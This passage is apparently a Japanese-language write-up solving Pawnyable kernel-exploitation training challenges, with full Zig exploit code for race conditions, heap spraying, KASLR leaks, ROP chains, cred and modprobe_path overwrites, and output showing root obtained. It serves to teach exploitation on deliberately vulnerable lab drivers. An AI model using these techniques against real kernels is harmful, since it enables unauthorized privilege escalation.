           const fd = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
           const fd2 = try posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660);
           posix.close(fd2);
       
           var ttys: [100]posix.fd_t = undefined;
           defer for (ttys) |tty| posix.close(tty);
           try spray(ttys[0..]);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf_addr = try leakHeap(fd);
           try aaw(fd, &ttys, g_buf_addr, std.mem.readInt(u32, "|/tm", .little), CORE_PATTERN);
           try aaw(fd, &ttys, g_buf_addr, std.mem.readInt(u32, "p/x\x00", .little), CORE_PATTERN+0x4);
       
           corePattern();
       }
       whoami: unknown uid 1337
       [INFO] Kernel base: 0xffffffffb0c00000
       [INFO] You won!!
       root
       
 (DIR) 完全なエクスプロイト
       
       === v4: Race Condition
       
       10c10
       < MODULE_DESCRIPTION("Holstein v3 - Vulnerable Kernel Driver for Pawnyable");
       ---
       > MODULE_DESCRIPTION("Holstein v4 - Vulnerable Kernel Driver for Pawnyable");
       14a15
       > int mutex = 0;
       20a22,27
       >   if (mutex) {
       >     printk(KERN_INFO "resource is busy");
       >     return -EBUSY;
       >   }
       >   mutex = 1;
       >
       71a79
       >   mutex = 0;
       
       TOCTOUが導入してしまった⸺​`mutex`​の確認と更新はアトミックじゃない。
       UAFを成功するためには、二つのスレッドが​`if
       (mutex)`​を通り過し、そして一つを閉じることが必要だ。
       <<pin-to-core>>
       
       var master_fd: ?posix.fd_t = null;
       fn race_master(slave_sync: *std.Thread.ResetEvent, master_sync: *std.Thread.ResetEvent) void {
           while (true) {
               std.Thread.sleep(2);
               if (posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660)) |mfd| {
                   slave_sync.wait();
                   slave_sync.reset();
                   if (slave_fd) |_| {
                       master_fd = mfd;
                       master_sync.set();
                       break;
                   }
                   posix.close(mfd);
               } else |err| switch (err) {
                   error.DeviceBusy => {
                       slave_sync.wait();
                       slave_sync.reset();
                   },
                   else => unreachable,
               }
               master_sync.set(); // resume execution of slave
           }
       }
       
       var slave_fd: ?posix.fd_t = null;
       fn race_slave(slave_sync: *std.Thread.ResetEvent, master_sync: *std.Thread.ResetEvent) void {
           while (true) {
               std.Thread.sleep(2);
               if (posix.open("/dev/holstein", .{ .ACCMODE = .RDWR }, 0o660)) |sfd| {
                   slave_fd = sfd;
                   slave_sync.set();
                   master_sync.wait(); // sleep and let master resume execution
                   master_sync.reset();
                   posix.close(sfd);
                   slave_fd = null;
                   if (master_fd) |_| break;
               } else |err| switch (err) {
                   error.DeviceBusy => {
                       slave_sync.set();
                       master_sync.wait(); // sleep and let master resume execution
                       master_sync.reset();
                   },
                   else => unreachable,
               }
           }
       }
       
       fn race() !posix.fd_t {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
       
           var slave_sync = std.Thread.ResetEvent{};
           var master_sync = std.Thread.ResetEvent{};
           var t1 = try std.Thread.spawn(.{}, race_master, .{&slave_sync, &master_sync});
           var t2 = try std.Thread.spawn(.{}, race_slave, .{&slave_sync, &master_sync});
       
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
       
           t1.join();
           t2.join();
       
           std.log.info("Won the race", .{});
           defer master_fd = null;
           return master_fd.?;
       }
       [INFO] Won the race
       
       複数のコアをヒープスプレーする時には微妙な違いはある。
       以下の説明は多分間違いが含むてる。
       
       `g_buf`​を解法する時(コア1で)、おそらく​`g_buf`[39
       m​に居るスラブはコア0またはコア1のいずれかのアクティブスラブ。
       何故なら、確保した時点で真っ直ぐに解放したから。
       `g_buf`​はコア1に確保した場合、解法するとコア1のアクティブスラブのlock-
       freeフリーリスト(それとスラブのフリーリストは別物)。
       つまり、​`g_buf`​に行った空虚な空間に新しい構造体を確保するてめに、その構造体はコア1
       から確保する必要だ。
       `g_buf`​はコア0に確保したとコア1に解法した場合、アクティブスラブのフリーリストに追加
       する。
       コア0に確保するでもコア1に確保するでも、結果は同じだ。[^fn:5], [^fn:6].
       
       要するに、コア0とコア1両方にスプレーするが必要だ。
       fn spray(dangling_fd: posix.fd_t, tty_fd: *?posix.fd_t) void {
           var fds: [100]posix.fd_t = undefined;
           var i: usize = 0;
           defer for (0..i) |j| posix.close(fds[j]);
           while (i < fds.len) : (i += 1) {
               fds[i] = posix.open("/dev/ptmx", .{ .ACCMODE = .RDONLY, .NOCTTY = true }, 0o660) catch return;
       
               // check if dangling_fd point to a tty_struct
               var buf =  [_]u8{0} ** @sizeOf(@FieldType(tty_struct, "magic"));
               _ = posix.read(dangling_fd, &buf) catch return;
               if (std.mem.eql(u8, &buf, std.mem.asBytes(&tty_struct{ .ops = undefined, .driver = undefined })[0..buf.len])) {
                   tty_fd.* = fds[i];
                   return;
               }
           }
       }
       
       fn getTty(fd: posix.fd_t) !posix.fd_t {
           return for (0..2) |cpu| {
               var ret: ?posix.fd_t = null;
               var t = try std.Thread.spawn(.{}, spray, .{fd, &ret});
               try pinThreadToCore(t.getHandle(), cpu);
               t.join();
               if (ret) |tty_fd| {
                   std.log.info("Heap spray succeeded on core {d}", .{cpu});
                   break tty_fd;
               } else {
                   std.log.warn("Heap spray failed on core {d}, retrying on {d}...", .{cpu, cpu+1});
               }
           } else error.SprayFailed;
       }
       [INFO] Won the race
       [INFO] Heap spray succeeded on core 0
       
       後はv3と同様に攻撃する。今度は​`task_struct`​を書き込めるをやろう。
       <<pawnyable-lib>>
       <<lk01-4-race>>
       <<lk01-4-spray>>
       <<tty_struct>>
       
       var MOV_ADDROF_RDX_RCX: u64 = 0xffffffff811b72c6;
       var MOV_EAX_ADDROF_RDX: u64 = 0xffffffff8145e3a8;
       
       var aa_memoize: ?enum { read, write } = null;
       
       fn aaw(fd: posix.fd_t, tty: posix.fd_t, g_buf_addr: u64, value: u32, address: u64) !void {
           switch (aa_memoize orelse .read) {
               .write => {},
               else => {
                   _ = try posix.write(fd, std.mem.asBytes(&tty_struct.init(g_buf_addr + @sizeOf(tty_struct))) ++ std.mem.asBytes(&tty_operations{ .ioctl = MOV_ADDROF_RDX_RCX }));
                   aa_memoize = .write;
               },
           }
       
           switch (posix.errno(linux.ioctl(tty, value, address))) {
               .SUCCESS => {},
               else => return error.AAWFail,
           }
       }
       
       fn aar(fd: posix.fd_t, tty: posix.fd_t, g_buf_addr: u64, address: u64) !u32 {
           switch (aa_memoize orelse .write) {
               .read => {},
               else => {
                   _ = try posix.write(fd, std.mem.asBytes(&tty_struct.init(g_buf_addr + @sizeOf(tty_struct))) ++ std.mem.asBytes(&tty_operations{ .ioctl = MOV_EAX_ADDROF_RDX }));
                   aa_memoize = .read;
               },
           }
       
           // we hijack the return value of ioctl, so we can't check it for errors
           return @intCast(0xffffffff & linux.ioctl(tty, 0xdeadbeef, address));
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &MOV_ADDROF_RDX_RCX,
               &MOV_EAX_ADDROF_RDX,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       
       fn leakKASLROffset(fd: posix.fd_t) !u64 {
           const ptmx_fops_addr: u64 = 0xffffffff81c3afe0;
       
           var buf: [@offsetOf(tty_struct, "ops")+@sizeOf(@FieldType(tty_struct, "ops"))]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - ptmx_fops_addr;
       }
       
       fn leakHeap(fd: posix.fd_t) !u64 {
           const offset = comptime blk: {
               const ld_semaphore = @FieldType(tty_struct, "ldisc_sem");
               break :blk @offsetOf(tty_struct, "ldisc_sem") + @offsetOf(ld_semaphore, "read_wait") + @sizeOf(@typeInfo(@FieldType(ld_semaphore, "read_wait")).@"struct".fields[0].type);
           };
           var buf: [offset]u8 = undefined;
           _ = try posix.read(fd, &buf);
           const ret = std.mem.bytesAsValue(u64, buf[buf.len-8..]).*;
           return ret - (buf.len-8);
       }
       
       pub fn main() !void {
           const fd = try race();
           const tty = try getTty(fd);
       
           const kaslr_offset = try leakKASLROffset(fd);
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           adjust_offsets(kaslr_offset);
       
           const g_buf = try leakHeap(fd);
       
           _ = try posix.prctl(.SET_NAME, .{@intFromPtr("okamikun"), 0, 0, 0});
       
           var addr: usize = g_buf - 0x1000000;
           const creds = while (addr < g_buf + 0x1000000) : (addr += 0x8) {
               if ((addr & 0xfffff) == 0)
                   std.debug.print("searching... 0x{s}\n", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&addr)), .lower)});
               if (std.mem.eql(u8, "okamikun", std.mem.sliceAsBytes(&[_]u32{try aar(fd, tty, g_buf, addr), try aar(fd, tty, g_buf, addr+0x4)}))) {
                   // task_struct is huge, I ain't copying that!
                   // just remember that `comm` comes immediately after `creds`.
                   break std.mem.readInt(u64, @ptrCast(std.mem.sliceAsBytes(&[_]u32{try aar(fd, tty, g_buf, addr-0x8), try aar(fd, tty, g_buf, (addr-0x8)+0x4)})), .little...
       
               }
           } else return error.HeapScanFailed;
       
           std.log.info("task_struct.creds = 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&creds)), .lower)});
       
           for (&[_]u64{@offsetOf(cred, "uid"), @offsetOf(cred, "euid")}) |offset|
               try aaw(fd, tty, g_buf, 0, creds+offset);
       
           whoami();
       }
       
       const cred = extern struct {
           usage: u32,
           uid: u32,
           gid: u32,
           suid: u32,
           sgid: u32,
           euid: u32,
           egid: u32,
           fsuid: u32,
           fsgid: u32,
       };
       whoami: unknown uid 1337
       [INFO] Won the race
       [INFO] Heap spray succeeded on core 0
       [INFO] Kernel base: 0xffffffff89400000
       searching... 0xffff89f501f00000
       searching... 0xffff89f502000000
       searching... 0xffff89f502100000
       searching... 0xffff89f502200000
       searching... 0xffff89f502300000
       searching... 0xffff89f502400000
       searching... 0xffff89f502500000
       searching... 0xffff89f502600000
       searching... 0xffff89f502700000
       searching... 0xffff89f502800000
       searching... 0xffff89f502900000
       searching... 0xffff89f502a00000
       searching... 0xffff89f502b00000
       searching... 0xffff89f502c00000
       searching... 0xffff89f502d00000
       searching... 0xffff89f502e00000
       searching... 0xffff89f502f00000
       searching... 0xffff89f503000000
       searching... 0xffff89f503100000
       searching... 0xffff89f503200000
       [INFO] task_struct.creds = 0xffff89f503363a00
       [INFO] You won!!
       root
       
 (DIR) 完全なexploit
       
       ちょっとムラだが、root権限昇格した!
       
       == Angus
       
       
       課題情報
       [*] './angus/qemu/rootfs/root/angus.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       grep /proc/cpuinfo -q -e 'smep' && echo 'SMEP enabled'
       grep /proc/cpuinfo -q -e 'smap' && echo 'SMAP enabled'
       grep /sys/devices/system/cpu/vulnerabilities/meltdown -q -e 'PTI' && echo 'KPTI enabled'
       grep /proc/cmdline -q -e 'nokaslr' || echo 'KASLR enabled'
       SMEP enabled
       KPTI enabled
       KASLR enabled
       ffffffffb8c00000 T startup_64
       ffffffffb8c00040 T secondary_startup_64
       ffffffffb8c00045 T secondary_startup_64_no_verify
       ffffffffb8c00240 T __startup_64
       ffffffffb8c005f0 T startup_64_setup_env
       ffffffffb8c72810 T commit_creds
       ffffffffb8c729b0 T prepare_kernel_cred
       ffffffffb9400e10 T swapgs_restore_regs_and_return_to_usermode
       
       ま、この課題は単純明快だね。
       const angus_ioctl = enum(u32) {
           INIT    = 0x13370001,
           SETKEY  = 0x13370002,
           SETDATA = 0x13370003,
           GETDATA = 0x13370004,
           ENCRYPT = 0x13370005,
           DECRYPT = 0x13370006,
       };
       
       const XorCipher = extern struct {
           key: [*]u8,
           data: [*]u8,
           keylen: usize,
           datalen: usize,
       };
       
       const request_t = extern struct {
           ptr: [*]u8,
           len: usize,
       };
       
       var zero_page: ?*allowzero XorCipher = null;
       fn mmap_null() !*allowzero XorCipher {
           if (zero_page) |ret| {
               return ret;
           } else {
               const rc = linux.mmap(
                   null,
                   std.heap.page_size_min,
                   linux.PROT.READ | linux.PROT.WRITE,
                   posix.MAP{
                       .TYPE = .PRIVATE,
                       .FIXED = true,
                       .ANONYMOUS = true,
                       .POPULATE = true,
                   },
                   -1,
                   0,
               );
               switch (posix.errno(rc)) {
                   .SUCCESS => zero_page = @ptrFromInt(rc),
                   .TXTBSY => return error.AccessDenied,
                   .ACCES => return error.AccessDenied,
                   .PERM => return error.PermissionDenied,
                   .AGAIN => return error.LockedMemoryLimitExceeded,
                   .BADF => unreachable,
                   .OVERFLOW => unreachable,
                   .NODEV => return error.MemoryMappingNotSupported,
                   .INVAL => unreachable,
                   .MFILE => return error.ProcessFdQuotaExceeded,
                   .NFILE => return error.SystemFdQuotaExceeded,
                   .NOMEM => return error.OutOfMemory,
                   .EXIST => return error.MappingAlreadyExists,
                   else => |err| return posix.unexpectedErrno(err),
               }
               return zero_page.?;
           }
       }
       
       fn aaw(fd: posix.fd_t, buf: []const u8, addr: usize) !void {
           var target_value: [128]u8 = undefined;
           std.debug.assert(buf.len <= target_value.len);
           try aar(fd, target_value[0..buf.len], addr);
           for (0..buf.len) |i| target_value[i] ^= buf[i];
       
           const ctx = try mmap_null();
           ctx.* = .{
               .key = @as([*]u8, &target_value),
               .keylen = buf.len,
               .data = @as([*]u8, @ptrFromInt(addr)),
               .datalen = buf.len,
           };
       
           const err = linux.ioctl(fd, @intFromEnum(angus_ioctl.ENCRYPT), @intFromPtr(&request_t{ .ptr = @ptrFromInt(1), .len = 0 }));
           switch (posix.errno(err)) {
               .SUCCESS => {},
               else => return error.AAWFail,
           }
       }
       
       fn aar(fd: posix.fd_t, buf: []u8, addr: usize) !void {
           const ctx = try mmap_null();
           ctx.* = .{
               .key = @constCast(@ptrCast(&[_]u8{0})),
               .keylen = 1,
               .data = @as([*]u8, @ptrFromInt(addr)),
               .datalen = buf.len,
           };
       
           const err = linux.ioctl(fd, @intFromEnum(angus_ioctl.GETDATA), @intFromPtr(&request_t{ .ptr = @as([*]u8, @ptrCast(@constCast(buf))), .len = buf.len }));
           switch (posix.errno(err)) {
               .SUCCESS => {},
               else => return error.AARFail,
           }
       }
       <<pawnyable-lib>>
       <<lk02-types>>
       
       var MODPROBE_PATH: u64 = 0xffffffff81e37e60;
       
       pub fn main() !void {
           const fd = try posix.open("/dev/angus", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           var buf: [8]u8 = undefined;
       
           var kaddr: usize = 0xffffffff81000000;
           while (kaddr < 0xffffffff80000000+0x40000000) : (kaddr += 0x100000) {
               if (aar(fd, &buf, kaddr)) {
                   std.log.info("Kernel base address: 0x{x}", .{kaddr});
                   break;
               } else |_| {}
           } else return error.KBaseAddressScanFailed;
       
           MODPROBE_PATH += kaddr-0xffffffff81000000;
       
           try aaw(fd, "/tmp/x\x00", MODPROBE_PATH);
       
           modprobePath();
       }
       whoami
       ./exploit
       /tmp/unknown &> /tmp/null
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Kernel base address: 0xffffffffb3400000
       [INFO] You won!!
       root
       
 (DIR) 完全なexploit
       
       == Dexter
       
       
       課題情報
       [*] './dexter/qemu/rootfs/root/dexter.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
       `dexter.c`​の脆弱性は​`copy_data_from_user`[49
       m​を2回を呼びること。
       攻撃者は合法な​`request_t`​で​`ioctl`[4
       9m​をする。
       そして​`verify_request`​の実行直後、合法な​`reque
       st_t`​と悪質な​`request_t`​を取り替えると、ヒープOOB
       読み取り/書き込みはできる。
       
       ならばこうしよう:
       
       1.  `/dev/dexter`​を開けると​`filp-
           >private_data`​を確保する
       2.  `seq_operations`​をスプレーする
       3.  `filp-
           >private_data`​に隣接する​`seq_operations.start`
           ​関数ポインターを上書きする
       
       SMAPが無効果されているならそれだけでいい。しかし、それじゃつまらないだろう。
       
       まずKASLRを倒す:      ​`shm_file_data`​(もひとりのkernel-
       32構造体)の​`ns`​フィールドの値はカネールのベスアドレスからの固定オフセットだ。
       
       さて、どこでROPchainを置くてかね。
       システムコールを実行する時にユーザ空間のレジスータはカネールのスタックに保存している。
       それぞれのガジェットのアドレスをレジスタに格納すれば、カネールが親切にROPchainをスタクに置くてやる。
       ギリギリだが​`modprobe_path`​を書き換えるROPchainは納めできる。
       const dexter_ioctl = enum(u32) {
           GET = 0xdec50001,
           SET = 0xdec50002,
       };
       
       const request_t = extern struct {
           ptr: [*]u8,
           len: usize,
       };
       
       const seq_operations = extern struct {
           start: usize,
           stop: usize,
           next: usize,
           show: usize,
       };
       
       const shm_file_data = extern struct {
           id: i32,
           ns: usize,
           file: usize,
           vm_ops: usize,
       };
       <<pin-to-core>>
       
       fn raceIoctl(fd: posix.fd_t, buf: []u8, op: dexter_ioctl, req: *request_t, race_is_won: *bool) void {
           // read what's currently in filp->private_data.
           switch(posix.errno(linux.ioctl(fd, @intFromEnum(dexter_ioctl.GET), @intFromPtr(&request_t{ .ptr = @ptrCast(buf), .len = 8 })))) {
               .SUCCESS => {},
               else => unreachable,
           }
           var pd_sentinel: [8]u8 = undefined;
           @memcpy(&pd_sentinel, buf[0..8]);
           inline for (0..8) |i| buf[i] ^= 0xff;
       
           outer: while (true) {
               req.* = request_t{ .ptr = @ptrCast(buf), .len = 0 };
       
               std.Thread.yield() catch {};
               const err = linux.ioctl(fd, @intFromEnum(op), @intFromPtr(req));
       
               switch (posix.errno(err)) {
                   .SUCCESS => {
                       switch (op) {
                           // if we succeeded in reading, pd_vanguard is in the start of buf
                           .GET => {
                               if (std.mem.eql(u8, buf[0..8], &pd_sentinel)) break :outer;
                           },
                           // if we succeeded in writing, pd_vanguard should no longer be the start of buf
                           .SET => {
                               var tmp: [8]u8 = undefined;
                               switch(posix.errno(linux.ioctl(fd, @intFromEnum(dexter_ioctl.GET), @intFromPtr(&request_t{ .ptr = &tmp, .len = 8 })))) {
                                   .SUCCESS => {},
                                   else => unreachable,
                               }
                               if (!std.mem.eql(u8, tmp[0..8], &pd_sentinel)) break :outer;
                           },
                       }
                   },
                   .INVAL => continue,
                   else => {},
               }
           }
           std.log.info("Won the race", .{});
           race_is_won.* = true;
       }
       
       fn raceCorrupt(dst: *request_t, len: usize, are_we_there_yet: *bool) void {
           while (!are_we_there_yet.*) {
               std.Thread.sleep(2);
               dst.*.len = len;
           }
       }
       
       fn overwrite(fd: posix.fd_t, buf: []u8) !void {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
           std.debug.assert(buf.len >= 32);
       
           var req: request_t = undefined;
           var race_is_won = false;
       
           var t1 = try std.Thread.spawn(.{}, raceIoctl, .{fd, buf, .SET, &req, &race_is_won});
           var t2 = try std.Thread.spawn(.{}, raceCorrupt, .{&req, buf.len, &race_is_won});
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
           t1.join();
           t2.join();
       }
       
       fn overread(fd: posix.fd_t, buf: []u8) !void {
           std.debug.assert(try std.Thread.getCpuCount() > 1);
           std.debug.assert(buf.len >= 32);
       
           var req: request_t = undefined;
           var race_is_won = false;
       
           var t1 = try std.Thread.spawn(.{}, raceIoctl, .{fd, buf, .GET, &req, &race_is_won});
           var t2 = try std.Thread.spawn(.{}, raceCorrupt, .{&req, buf.len, &race_is_won});
           try pinThreadToCore(t1.getHandle(), 0);
           try pinThreadToCore(t2.getHandle(), 1);
           t1.join();
           t2.join();
       }
       const shm_c = @cImport({
           @cInclude("sys/shm.h");
           @cInclude("sys/ipc.h");
           @cInclude("sys/types.h");
       });
       
       const ShmInfo = struct {
           segment: c_int,
           addr: *const anyopaque,
       };
       
       fn shmSpray(shms: []ShmInfo) !void {
           for (shms) |*shm| {
               const shmId = shm_c.shmget(shm_c.IPC_PRIVATE, std.heap.page_size_min, shm_c.IPC_CREAT | 0o666);
               switch (posix.errno(shmId)) {
                   .SUCCESS => {},
                   else => |err| return posix.unexpectedErrno(err),
               }
               shm.* = .{ .segment = shmId, .addr = shm_c.shmat(shmId, null, shm_c.SHM_RDONLY).? };
           }
       }
       fn shmFree(shms: []ShmInfo) void {
           for (shms) |shm| {
               switch (posix.errno(shm_c.shmctl(shm.segment, shm_c.IPC_RMID, null))) {
                   .SUCCESS => {},
                   else => |_| {},
               }
               switch (posix.errno(shm_c.shmdt(shm.addr))) {
                   .SUCCESS => {},
                   else => |_| {},
               }
           }
       }
       var ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP: u64 = 0xffffffff811481c6;
       
       var POP_RDX_POP_RSI_POP_RDI_POP_RBP: u64 = 0xffffffff810012c1;
       var POP_R10_POP_RBP: u64 = 0xffffffff81384eec;
       var ADD_ADDROF_RSI_RDX: u64 = 0xffffffff81399ff3;
       
       var SYSCALL_RETURN_VIA_SYSRET: u64 = 0xffffffff818000fb; // similar to but not exactly the same as KPTI_TRAMPOLINE
       var MODPROBE_PATH: u64 = 0xffffffff81e37e60;
       
       inline fn ropchain(fd: posix.fd_t) void {
           const modprobe_difference: u64 = @bitCast(-@as(i64, @intCast(std.mem.bytesToValue(u64, "/sbin/m") - std.mem.bytesToValue(u64, "/tmp/x\x00"))));
           // we don't control the return address (rcx) so this will segfault once we return to userspace (importantly, this will not cause a kernel panic)
           // when stuffing a ropchain in pt_regs this is an big advantage over commit_creds(&init_cred), which requires a clean userspace return
           asm volatile (""
               :
               : [_] "{r15}" (POP_RDX_POP_RSI_POP_RDI_POP_RBP),
                 [_] "{r14}" (modprobe_difference),
                 [_] "{r13}" (MODPROBE_PATH),
                 // [junk] "{r12}" (),
                 [_] "{rbx}" (POP_R10_POP_RBP),
                 // [junk] "{r10}" (),
                 [_] "{r9}" (ADD_ADDROF_RSI_RDX),
                 [_] "{r8}" (SYSCALL_RETURN_VIA_SYSRET),
           );
       
           _ = @call(.always_inline, linux.syscall3, .{ linux.SYS.lseek, @as(usize, @bitCast(@as(isize, fd))), 1, linux.SEEK.CUR });
       }
       
       fn adjust_offsets(kaslr_offset: u64) void {
           const gadgets = &[_]*u64{
               &ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP,
               &POP_RDX_POP_RSI_POP_RDI_POP_RBP,
               &POP_R10_POP_RBP,
               &ADD_ADDROF_RSI_RDX,
       
               &SYSCALL_RETURN_VIA_SYSRET,
               &MODPROBE_PATH,
           };
           for (gadgets) |g| {
               g.* += kaslr_offset;
           }
       }
       <<pawnyable-lib>>
       <<lk03-types>>
       <<lk03-race>>
       <<lk03-shm>>
       <<lk03-ropchain>>
       
       fn spray(fds: []posix.fd_t) !void {
           for (0..fds.len) |i| {
               fds[i] = try posix.open("/proc/self/stat", .{ .ACCMODE = .RDONLY }, 0o660);
           }
       }
       
       pub fn main() !void {
           const fd = try posix.open("/dev/dexter", .{ .ACCMODE = .RDWR }, 0o660);
           defer posix.close(fd);
       
           var shm_addrs: [100]ShmInfo = undefined;
           try shmSpray(&shm_addrs);
       
           var buf: [32+32*2]u8 = undefined;
           try overread(fd, &buf);
       
           const init_ipc_ns: u64 = 0xffffffff81eb2c00;
           const kaslr_offset = std.mem.readInt(u64, buf[buf.len-32..][@offsetOf(shm_file_data, "ns")..][0..8], .little) - init_ipc_ns;
           std.log.info("Kernel base at 0x{x}", .{0xffffffff81000000 + kaslr_offset});
           adjust_offsets(kaslr_offset);
       
           shmFree(&shm_addrs);
       
           var stat_fds: [1000]posix.fd_t = undefined;
           try spray(&stat_fds);
           defer for (stat_fds) |sfd| posix.close(sfd);
       
           @memcpy(buf[32+32..][@offsetOf(seq_operations, "start")..][0..8], std.mem.asBytes(&ADD_RSP_0xb8_POP_R13_POP_R14_POP_R15_POP_RBP));
           try overwrite(fd, &buf);
       
           for (stat_fds) |sfd| {
               ropchain(sfd);
           }
           // let it crash!
       }
       whoami
       ./exploit
       echo '#!/bin/sh\n/usr/bin/whoami &> /tmp/whoisit\nchmod 777 /tmp/whoisit' > /tmp/x
       chmod 777 /tmp/x
       touch /tmp/unknown
       chmod 777 /tmp/unknown
       /tmp/unknown &> /tmp/null
       cat /tmp/whoisit
       whoami: unknown uid 1337
       [INFO] Won the race
       [INFO] Kernel base at 0xffffffff8e400000
       [INFO] Won the race
       Segmentation fault
       root
       
 (DIR) 完全なexploit
       
       セグフォルトによるエクスポロイトがクラッシュしたのはちょっとハック的だが、結局は権限昇格できた。
       
       == Fleckvieh
       
       
       課題情報
       [*] './fleckvieh/qemu/rootfs/root/fleckvieh.ko'
           Arch:       amd64-64-little
           RELRO:      No RELRO
           Stack:      No canary found
           NX:         NX enabled
           PIE:        No PIE (0x0)
           Stripped:   No
       sed -i -E "s|^(echo 2 > /proc/sys/kernel/kptr_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s|^(echo 1 > /proc/sys/kernel/dmesg_restrict)|# \1|" rootfs/etc/init.d/S99pawnyable
       sed -i -E "s/(setuidgid) 1337 (sh)/\1 0 \2/" rootfs/etc/init.d/S99pawnyable
       
       sed -i '/${DEBUG:+ -s} \\/d' run.sh
       sed -i -E '/qemu-system-x86_64 \\/a \ \ \ \ ${DEBUG:+ -s} \\' run.sh
       sed -i -E 's/ kaslr/ ${NOKASLR:+no}kaslr/' run.sh
       sed -i '/-serial unix:vm.sock,server,nowait/d' run.sh
       sed -i -E '/-monitor \/dev\/null/a \ \ \ \ -serial unix:vm.sock,server,nowait \\' run.sh
       SMEP enabled
       SMAP enabled
       KPTI enabled
       KASLR enabled
       
       ま、ごく普通の競合状態。
       
       1.  `blob_get`​や​`blob_set`
           ​の中に​`blob_list               *victim               =
           blob_find_by_id(...)`​を実行し
       2.  他のスレードで​`blob_del`​を実行し、​`victim`
           ​を指すブロブを開放する
       3.  ヒープスプレー
       4.  `copy_to_user`​/​`copy_from_user`
           ​に実行の時に​`victim-
           >data`​(現在ダングリングポインタ)は選択したカネル構造体を指してる;AAR/AAW手に入れた
       const fleckvieh = struct {
           pub const ops = enum(u32) {
               ADD = 0xf1ec0001,
               DEL = 0xf1ec0002,
               GET = 0xf1ec0003,
               SET = 0xf1ec0004,
           };
           pub fn ioctl(fd: posix.fd_t, op: ops, buf: ?[]u8, id: ?i32) !i32 {
               if (op != .ADD and id == null) return error.InvalidArgument;
               const ret = linux.ioctl(fd, @intFromEnum(op), @intFromPtr(&request_t{ .id = id orelse undefined, .size = if (buf) |b| b.len else undefined, .data = if ...
       
               switch (posix.errno(ret)) {
                   .SUCCESS => return @intCast(@as(i64, @bitCast(ret))),
                   else => |e| return posix.unexpectedErrno(e),
               }
           }
       };
       
       
       const request_t = extern struct {
           id: i32,
           size: usize,
           data: [*]u8,
       };
       
       const blob_list = extern struct {
           const struct_head = extern struct {
               next: *struct_head,
               prev: *struct_head,
           };
       
           id: i32,
           size: usize,
           data: [*]u8,
           list: struct_head,
       };
       
       だが競合状態を悪用する好機(​`blob_find_by_id`​と​`c
       opy_from_user`​の間)は短すぎる。
       時間を稼げる方法を二つ紹介する⸺userfaultfdとFUSE。
       
       === userfaultfd
       
       
       userfaultfdはページフォルトをユーザー空間の中に対処するものだ。
       「なぜそんなもん役立つか?」と聞いてるだろう。
       いくつかの正当な使用例はあるだろう、だがpwnの場合なら価値はカーネルスレードを停滞することだ。
       この悪用能力はかなりやばいから、この機能(具体的にはカネル空間に由来するページフォルト)はLinux
       5.2で特権が必要な行動になった。[^fn:7]
       
       まずはuserfaultfdのハローワールド [5]を実装しろう。
       <<pin-to-core>>
       
       const userfaultfd = struct {
           pub const msg = packed struct {
               pub const EVENT = enum(u8) {
                   PAGEFAULT = 0x12,
                   FORK,
                   REMAP,
                   REMOVE,
                   UNMAP,
               };
               event: EVENT,
       
               _reserved1: u8,
               _reserved2: u16,
               _reserved3: u32,
       
               arg: packed union {
                   pagefault: packed struct {
                       pub const FLAG = packed struct (u64) {
                           WRITE: bool = false,
                           WP: bool = false,
                           MINOR: bool = false,
                           _: u61 = 0,
                       };
       
                       flags: FLAG,
                       address: u64,
                       feat: packed union { ptid: u32 },
                   },
                   fork: packed struct { ufd: u32 },
                   remap: packed struct {
                       from: u64,
                       to: u64,
                       len: u64,
                   },
                   remove: packed struct {
                       start: u64,
                       end: u64,
                   },
                   _reserved: packed struct {
                       _reserved1: u64,
                       _reserved2: u64,
                       _reserved3: u64,
                   },
               },
           };
       
           const uffdio_api = extern struct {
               pub const FEATURE = packed struct (u64) {
                   PAGEFAULT_FLAG_WP: bool = false,
                   EVENT_FORK: bool = false,
                   EVENT_REMAP: bool = false,
                   EVENT_REMOVE: bool = false,
                   MISSING_HUGETLBFS: bool = false,
                   MISSING_SHMEM: bool = false,
                   EVENT_UNMAP: bool = false,
                   SIGBUS: bool = false,
                   THREAD_ID: bool = false,
                   MINOR_HUGETLBFS: bool = false,
                   MINOR_SHMEM: bool = false,
                   _: u53 = 0,
               };
       
               api: u64,
               features: FEATURE,
               ioctls: u64,
           };
           const uffdio_range = extern struct {
               start: u64,
               len: u64,
           };
           const uffdio_register = extern struct {
               pub const MODE = packed struct (u64) {
                   MISSING: bool = false,
                   WP: bool = false,
                   MODE_MINOR: bool = false,
                   _: u61 = 0,
               };
       
               range: uffdio_range,
               mode: MODE,
               ioctls: u64,
           };
